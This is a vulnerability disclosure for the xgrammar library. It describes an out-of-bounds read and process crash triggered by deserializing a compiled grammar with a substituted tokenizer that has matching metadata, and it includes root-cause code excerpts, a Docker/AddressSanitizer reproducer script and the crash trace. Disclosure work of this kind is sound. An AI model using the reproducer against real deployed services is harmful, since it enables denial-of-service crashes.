Out-of-Bounds Read Through Compiled-Tokenizer Substitution
Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730
Summary
At assessed main revision f07ca3c, CompiledGrammar::DeserializeJSON verifies only coarse tokenizer metadata before attaching a caller-supplied TokenizerInfo to a serialized compiled grammar. The compiled cache is nevertheless positional: its adaptive masks contain indices into the exact sorted_decoded_vocab used at compilation time. An application is affected when Mallory can cause it to load an otherwise valid compiled artifact with a different tokenizer whose vocabulary type, declared size, prefix-space flag, and stop-token IDs match the original values. This is not a network attack by itself, and callers that always reuse the exact tokenizer used for compilation do not expose this substitution path.
The reproducer compiles with ordinary tokens a, b, and c, then restores the artifact with a same-size tokenizer in which b and c are empty special tokens. The source cache contains accepted sorted-vocabulary index 2, while the replacement tokenizer has only one ordinary-token entry. Mask generation reads sorted_decoded_vocab[2] from that one-entry vector and passes the resulting invalid token ID to DynamicBitset::Set. A captured AddressSanitizer run terminates the process in that path. This establishes an out-of-bounds read and process-crash primitive; it does not establish disclosure or code execution.
Detail
The security-relevant prerequisite is tokenizer substitution, not merely possession of a compiled artifact. For example, a service may trust a precompiled grammar cache but accept or select a tokenizer from a separately supplied model package. Mallory must be able to influence that second input so that the service combines two objects that were not produced together. If Mallory can instead modify the serialized compiled grammar itself, the unchecked-cache-index issue described in 03-compiled-cache-index-oob.md is the more direct trust-boundary failure.
TokenizerInfo::Impl::Impl in cpp/tokenizer_info.cc decodes every token, excludes stop and special tokens, and lexicographically sorts the remaining (token_id, token) pairs. Adaptive-mask indices therefore describe positions in this derived vector, not token IDs and not positions in the original encoded vocabulary:
if ((!stop_token_ids && DETECTION_STOP_TOKENS.count(token)) ||
(stop_token_ids &&
std::find(stop_token_ids->begin(), stop_token_ids->end(), i) != stop_token_ids->end())) {
stop_token_ids_.push_back(i);
} else if (IsSpecialToken(token)) {
special_token_ids_.push_back(i);
} else {
sorted_decoded_vocab_.push_back({i, token});
}
std::sort(sorted_decoded_vocab_.begin(), sorted_decoded_vocab_.end(), f_compare_token);
For the source tokenizer, the derived vector is [(0, "a"), (1, "b"), (2, "c")]. For the target tokenizer, empty strings are special and <eos> is the configured stop token, so the derived vector is only [(0, "a")]. Both tokenizers still report RAW, vocab_size == 4, add_prefix_space == false, and stop_token_ids == [3].
The compiled artifact does not preserve the identity needed by those positional indices. TokenizerInfo::Impl::DumpMetadataValue records only the four coarse properties, and CheckMetadataMatch compares only those properties. CompiledGrammar::DeserializeJSONValue treats a successful comparison as sufficient and associates the replacement tokenizer with the source cache:
const auto& tokenizer_metadata = object["tokenizer_metadata"];
if (auto error = tokenizer_info->CheckMetadataMatch(tokenizer_metadata)) {
return ConstructDeserializeError(
std::string("Tokenizer metadata mismatch: ") + error->what(), type_name
);
}
impl->tokenizer_info = tokenizer_info;
The root cause is therefore an identity/invariant mismatch across serialization. Compilation establishes that every cached index is valid for one concrete sorted vocabulary, but serialization records neither that vocabulary nor an exact identity for it. Deserialization checks fields that do not determine how many ordinary tokens exist or which token occupies each sorted position, then rebinds the positional cache to a different vector. The artifact is structurally valid and the replacement tokenizer is valid in isolation; the unsafe state is created only by composing them.
For grammar root ::= "c", compilation stores sorted-vocabulary index 2 in an accepted-index mask. GrammarMatcher::Impl::FillBitmaskForStates in cpp/grammar_matcher.cc later trusts it:
for (auto idx : adaptive_token_mask.accepted_indices) {
tmp_accepted_bitset_.Set(sorted_decoded_vocab[idx].first, true);
}
There is no intervening bounds check. operator[] reads beyond the one-entry replacement vector; the invalid .first value is then used as a bit index, which is why the captured stack terminates in DynamicBitset::Set rather than reporting a checked std::vector exception. The same substitution can also corrupt mask semantics without crashing when both derived vectors have the same length but different ordering or token IDs.
Using the original tokenizer for deserialization is the principal negative control: its decoded vocabulary recreates the vector against which the indices were compiled, and the repository's ordinary compiled-grammar round-trip test succeeds. Merely matching vocab_size is not a useful control because that is exactly what the reproducer does. Bounds validation at compiled-grammar deserialization remains necessary defense in depth: exact tokenizer binding prevents substitution, while index validation independently rejects a malformed cache even when its embedded metadata is self-consistent.
Reproduce
Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.
The following disposable Docker command pins the assessed revision, builds the Python extension with AddressSanitizer, and executes the trigger. It intentionally crashes only the containerized Python process.
docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --depth 1
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > repro.py <<'PY'
import xgrammar as xgr
source = xgr.TokenizerInfo(
["a", "b", "c", "<eos>"], xgr.VocabType.RAW, stop_token_ids=[3]
)
target = xgr.TokenizerInfo(
["a", "", "", "<eos>"], xgr.VocabType.RAW, stop_token_ids=[3]
)
compiled = xgr.GrammarCompiler(
source, max_threads=1, cache_enabled=False
).compile_grammar('root ::= "c"')
restored = xgr.CompiledGrammar.deserialize_json(compiled.serialize_json(), target)
matcher = xgr.GrammarMatcher(restored, terminate_without_stop_token=True)
matcher.fill_next_token_bitmask(xgr.allocate_token_bitmask(1, target.vocab_size))
PY
report15_asan=$(gcc -print-file-name=libasan.so)
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$report15_asan" \
python repro.py
DOCKER
The captured vulnerable run reached the expected cache-consumption path:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3540==ERROR: AddressSanitizer: SEGV on unknown address 0x601ff7f6f8c8
==3540==The signal is caused by a READ memory access.
#0 xgrammar::DynamicBitset::Set(int, bool) cpp/support/dynamic_bitset.h:142
#1 xgrammar::GrammarMatcher::Impl::FillBitmaskForStates(...) cpp/grammar_matcher.cc:1880
#2 xgrammar::GrammarMatcher::Impl::FillNextTokenBitmask(...) cpp/grammar_matcher.cc:1700
#3 xgrammar::GrammarMatcher::FillNextTokenBitmask(...) cpp/grammar_matcher.cc:2604
SUMMARY: AddressSanitizer: SEGV cpp/support/dynamic_bitset.h:142 in xgrammar::DynamicBitset::Set(int, bool)
==3540==ABORTING
Credit
Zheng Yu @ Depthfirst